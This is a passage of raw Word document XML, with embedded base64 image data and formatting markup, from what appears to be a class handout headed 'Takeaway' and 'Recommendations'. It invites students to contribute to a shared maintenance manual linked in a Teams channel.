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&#10;">
                <v:shape id="Shape 11585" o:spid="_x0000_s1147" style="position:absolute;top:478;width:14691;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1469136,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bL3MQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H+wdwhl4N9MOtVKNIv6ADMY21wc4NMe2&#10;mJyUJNP69stgsLvz8f2e5XqwRlzJh86xgnycgSCune64UVB9HZ7nIEJE1mgck4I7BVivHh+WWGp3&#10;40+6nmIjUgiHEhW0MfallKFuyWIYu544cWfnLcYEfSO1x1sKt0a+ZNlMWuw4NbTY07al+nL6tgqK&#10;Sbbz7/mr+aj87M1cdsW+koVSo6dhswARaYj/4j/3Uaf5+XQ+hd930g1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my9zEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l1469136,r,175260l,175260,,e" fillcolor="#f2f2f2" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1469136,175260"/>
                </v:shape>
                <v:rect id="Rectangle 237" o:spid="_x0000_s1148" style="position:absolute;left:182;top:286;width:9620;height:2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vf/8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS4vCQBCE78L+h6EX9qaTdcFHdBRZXfToC9Rbk2mT&#10;YKYnZGZN9Nc7guCxqKqvqPG0MYW4UuVyywq+OxEI4sTqnFMF+91fewDCeWSNhWVScCMH08lHa4yx&#10;tjVv6Lr1qQgQdjEqyLwvYyldkpFB17ElcfDOtjLog6xSqSusA9wUshtFPWkw57CQYUm/GSWX7b9R&#10;sByUs+PK3uu0WJyWh/VhON8NvVJfn81sBMJT49/hV3ulFXR/+v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m9//xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Takeaway</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 238" o:spid="_x0000_s1149" style="position:absolute;left:7391;top:286;width:563;height:2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RLjcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy2rCQBTdF/yH4Qrd1YkRiomOIj7QZWsK6u6SuSbB&#10;zJ2QGZO0X99ZFLo8nPdyPZhadNS6yrKC6SQCQZxbXXGh4Cs7vM1BOI+ssbZMCr7JwXo1elliqm3P&#10;n9SdfSFCCLsUFZTeN6mULi/JoJvYhjhwd9sa9AG2hdQt9iHc1DKOondpsOLQUGJD25Lyx/lpFBzn&#10;zeZ6sj99Ue9vx8vHJdlliVfqdTxsFiA8Df5f/Oc+aQXxLKwN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ARLjcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 8946" o:spid="_x0000_s1150" type="#_x0000_t75" style="position:absolute;left:15645;top:-4;width:2635;height:24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msNlPGAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyhN7qRlGxqWsQIbQW&#10;wTYp9PrIPpNg9m3Y3Wr8926h0OMwM98w62wwnbiQ861lBdNJAoK4srrlWsFXmT+tQPiArLGzTApu&#10;5CHbjB7WmGp75U+6FKEWEcI+RQVNCH0qpa8aMugntieO3sk6gyFKV0vt8BrhppOzJFlKgy3HhQZ7&#10;2jVUnYsfo+D9cDyU5XfLefLqinI/rwez+FDqcTxsX0AEGsJ/+K/9phWsnudL+H0Tn4Dc3A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qaw2U8YAAADdAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId22" o:title=""/>
                </v:shape>
                <v:shape id="Picture 8947" o:spid="_x0000_s1151" type="#_x0000_t75" style="position:absolute;left:18693;top:-4;width:2635;height:24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bgk8jGAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyBG91Y9Fqo6tIQVqL&#10;YJsUvD6yzySYfRt2V43/3i0IPQ4z8w2zWHWmERdyvrasYDRMQBAXVtdcKvjNN88zED4ga2wsk4Ib&#10;eVgte08LTLW98g9dslCKCGGfooIqhDaV0hcVGfRD2xJH72idwRClK6V2eI1w08iXJHmVBmuOCxW2&#10;9F5RccrORsHXbr/L80PNm+TDZfl2XHZm8q3UoN+t5yACdeE//Gh/agWzt/EU/t7EJyCXd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xuCTyMYAAADdAAAADwAAAAAAAAAAAAAA&#10;AACfAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAJIDAAAAAA==&#10;">
                  <v:imagedata r:id="rId22" o:title=""/>
                </v:shape>
                <v:shape id="Picture 8948" o:spid="_x0000_s1152" type="#_x0000_t75" style="position:absolute;left:22090;top:-4;width:2635;height:24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Fi8xfCAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxET89rwjAUvg/8H8ITvM1UkanVKFImeBtq&#10;N/D2SJ5tafNSmsx2//1yEDx+fL+3+8E24kGdrxwrmE0TEMTamYoLBfn1+L4C4QOywcYxKfgjD/vd&#10;6G2LqXE9n+lxCYWIIexTVFCG0KZSel2SRT91LXHk7q6zGCLsCmk67GO4beQ8ST6kxYpjQ4ktZSXp&#10;+vJrFRy+9LI/1nl2NfkN62xR/3zrT6Um4+GwARFoCC/x030yClbrRZwb38QnIH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BYvMXwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJ8C&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAjgMAAAAA&#10;">
                  <v:imagedata r:id="rId23" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="158" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="358" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintenance (Manual) is now available to all students of this class to refer, add your experience and share your reflections. DON’T FORGET TO ADD YOUR NAME IN YOUR POST. Each poster will be awarded with for their work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Link is shared in our Teams Channel!!! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="47" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5768340" cy="218237"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8844" name="Group 8844"/>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1586" name="Shape 11586"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="19202"/>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258" name="Rectangle 258"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="18288" y="0"/>
                            <a:ext cx="1815310" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Recommendations</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="259" name="Rectangle 259"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1382268" y="0"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 8844" o:spid="_x0000_s1153"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5EOgMAAMoJAAAOAAAAZHJzL2Uyb0RvYy54bWy8Vutq2zAU/j/YOwj/X31JnTghSRntWgZj&#10;LW33AIotX0CWjKTc9vQ7OrKc9LKydpAE7GPpXL9zkeYXu5aTDVO6kWIRxGdRQJjIZdGIahH8erz+&#10;kgVEGyoKyqVgi2DPdHCx/Pxpvu1mLJG15AVTBJQIPdt2i6A2ppuFoc5r1lJ9JjsmYLOUqqUGPlUV&#10;FopuQXvLwySKxuFWqqJTMmdaw+qV2wyWqL8sWW5uy1IzQ/giAN8MPhU+V/YZLud0Vina1U3eu0E/&#10;4EVLGwFGB1VX1FCyVs0LVW2TK6llac5y2YayLJucYQwQTRw9i+ZGyXWHsVSzbdUNMAG0z3D6sNr8&#10;5+ZOkaZYBFl2fh4QQVvIEhomuAIAbbtqBnw3qnvo7lS/ULkvG/OuVK19QzRkh9DuB2jZzpAcFtPJ&#10;OBudQwZy2EviLBlNHPZ5DQl6IZbX394WDL3Z0Ho3OLPtoIz0ASn9f0g91LRjmABtEeiRiuM0G3uo&#10;kIW4JYQGOQeg9EwDZn9FKZ4mUeKAeBWpeJImY6zSIWA6y9fa3DCJmNPND21cEReeorWn8p3wpIJW&#10;eLMJOmqsnHXVkmR7lLQaWtt5YrdbuWGPEhnNs8yBl4ddLo65hgrwxQG8nsO/O9R3zPkEAM/m344d&#10;igpU/jOjR9MpASdstMt5TyACQB9jzIUFw9YuhQlVcmqw1dvGwOjiTQvGk0kUHRSDNluILvNImT1n&#10;FjAu7lkJ7YZtYhe0qlaXXJENtQMKf7YcEBtgtSxlw/kgFaPpJ1LXif33Uj2zlWM4/gbJyEnmvUE3&#10;A2GSQFx+EoLVQQgtS2EGeQHzG40cBWTJlSz2OBUwZmg+OzBO0IVJCkeLG1f3UNtUVJwRu/ieLoRB&#10;lIEaX5IQfz924ixOR7GfV9MoSdMeYT/tOuW6kFhiEdj+QoR9R9qC6lksllzYp5DXkE2f4Bd1Ynar&#10;HQ7jBK0d4CW1VL9v4ZwtuYRahAZEKiD8u4AZB34aTyhPrDyhDL+UeP45F76ujSwbOzUwZS6B/ccp&#10;8zd9LX/T9+VvlCXJ+NUMpuNRDAcanjenz9/Yh+HQPW3+8EyECwPOkf5yY28kx9+Y78MVbPkHAAD/&#10;/wMAUEsDBBQABgAIAAAAIQAD3Vzy3QAAAAQBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9Ba8JAEIXv&#10;Bf/DMoXe6iaaik2zEZG2JymohdLbmB2TYHY2ZNck/vtue6mXgcd7vPdNthpNI3rqXG1ZQTyNQBAX&#10;VtdcKvg8vD0uQTiPrLGxTAqu5GCVT+4yTLUdeEf93pcilLBLUUHlfZtK6YqKDLqpbYmDd7KdQR9k&#10;V0rd4RDKTSNnUbSQBmsOCxW2tKmoOO8vRsH7gMN6Hr/22/Npc/0+PH18bWNS6uF+XL+A8DT6/zD8&#10;4gd0yAPT0V5YO9EoCI/4vxu852iZgDgqmCcJyDyTt/D5DwAAAP//AwBQSwECLQAUAAYACAAAACEA&#10;toM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQA&#10;BgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQA&#10;BgAIAAAAIQBBA/5EOgMAAMoJAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQAD3Vzy3QAAAAQBAAAPAAAAAAAAAAAAAAAAAJQFAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAAngYAAAAA&#10;">
                <v:shape id="Shape 11586" o:spid="_x0000_s1154" style="position:absolute;top:192;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wcP8MA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CDfY20wdTKQaRRxD8U0t6OORnG1p&#10;cylJrJ1//TIQfLuP7+fNl4NtRU8+1I4VjEcZCGLtTM2lguL48zEFESKywdYxKfilAMvF68scc+Nu&#10;vKf+EEuRQjjkqKCKsculDLoii2HkOuLEXZy3GBP0pTQebynctvIzyybSYs2pocKO1hXp5nC1CvSp&#10;9zt9bTb3Ip435/322Gj5rdT727CagYg0xKf44d6aNH/8NZ3A/zvpBr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wcP8MAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l5768340,r,175260l,175260,,e" fillcolor="#f2f2f2" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5768340,175260"/>
                </v:shape>
                <v:rect id="Rectangle 258" o:spid="_x0000_s1155" style="position:absolute;left:182;width:1815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uLcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy2rCQBTdF/yH4Qrd1YkBi4mOIj7QZWsK6u6SuSbB&#10;zJ2QGZO0X99ZFLo8nPdyPZhadNS6yrKC6SQCQZxbXXGh4Cs7vM1BOI+ssbZMCr7JwXo1elliqm3P&#10;n9SdfSFCCLsUFZTeN6mULi/JoJvYhjhwd9sa9AG2hdQt9iHc1DKOondpsOLQUGJD25Lyx/lpFBzn&#10;zeZ6sj99Ue9vx8vHJdlliVfqdTxsFiA8Df5f/Oc+aQXxLKwN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uuLcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Recommendations</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 259" o:spid="_x0000_s1156" style="position:absolute;left:13822;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cLtsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3uqmAYuJriJaSY5tFGxvj+wz&#10;Cc2+DdmtSfvruwXB4zAz3zCrzWhacaXeNZYVPM8iEMSl1Q1XCk7Hw9MChPPIGlvLpOCHHGzWk4cV&#10;ptoO/E7XwlciQNilqKD2vkuldGVNBt3MdsTBu9jeoA+yr6TucQhw08o4il6kwYbDQo0d7Woqv4pv&#10;oyBbdNuP3P4OVfv6mZ3fzsn+mHilHqfjdgnC0+jv4Vs71wrieQL/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pcLtsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="181" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You could use any of the following as per your convenience. Highlighted is used here. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
